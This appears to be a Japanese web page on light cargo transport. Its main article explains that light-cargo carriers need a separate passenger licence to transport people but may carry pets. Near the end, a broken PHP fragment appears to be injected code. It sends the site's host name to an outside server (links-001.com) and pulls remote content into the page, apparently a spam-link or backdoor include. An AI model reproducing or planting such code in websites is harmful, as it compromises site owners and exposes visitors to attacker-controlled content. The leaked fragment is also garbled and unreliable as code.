前へ
次へ

軽貨物の運送業者として納税する必要のある住民税

軽貨物の求人にて雇用されているドライバーではなく、軽貨物のマッチングサイトなどにて仕事の依頼を受けて

more

今後軽貨物の運送業者として働く場合に重要となってくる付加価値

近年の宅配物の増加やサービスの多様化に伴い、軽貨物の運送業者間の競争が激しくなっています。そのため、

more

近年軽貨物の運送にて注目されているツーマン配送

軽貨物の運送業者は、新規参入が容易であることや宅配物の増量やサービスの多様化により軽貨物の運送の需要

more

軽貨物の運送業者が人を運送することは可能か

軽貨物の運送業者として働く場合荷物以外に人間の送迎を行っても良いのではと思うドライバーがいるかもしれません。実際に軽自動車で人の送迎をしているのを見かけたことのある人もいるでしょう。しかし実際軽貨物の求人に記載されている業務内容でも人間を送り届けるといった内容はありません。法律上軽貨物の運送業者が人を送迎することは可能なのでしょうか。軽貨物の運送業者として働くのを許可する場合貨物軽自動車運送事業という区分分けとなり、運輸局などへ必要な届出を行う必要があります。一方人の送迎を行うには旅客自動車運送事業という別の許可が必要となります。そのため軽貨物の運送業者が人間の送迎を行うことは不可能です。ですから軽貨物の運送を本業とする人が人の送迎を行うことは違法となりますので注意が必要です。逆に同じ生き物でも犬や猫などのペットの場合はどうなるのでしょうか。最近はペットショップなどが犬猫を仕入れる時以外にも動物病院に連れていく場合などに利用できるサービスとしてペットタクシーという名称で軽貨物にて動物を運送することがあります。タクシーという名前になっていますが、ペットは法律上物と同じ扱いになるため、人間の様に旅客自動車運送事業の許可ではなく、軽貨物の運送業者と同じ許可で事業をすることが可能です。ただし飼い主も同情する場合は軽貨物の運送の許可だけでは乗せられないので、注意しましょう。またペットサロンなどがカットのために預かったペットを無料で送り届ける場合は軽貨物の運送業の許可は必要ありません。しかし送迎に関する料金を請求している場合は軽貨物の運送に関する許可が必要になります。このように軽貨物による運送では人間を送迎することは不可能となっています。しかし犬・猫などのペットであれば軽貨物の運送業者でも行うことが可能です。しかし大事な家族の一員であるペットを預かるのですからもし事業として行うのであれば、動物取扱業などの専門知識の取得や衛生管理などの厳しいリスク管理をする必要がありそうです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top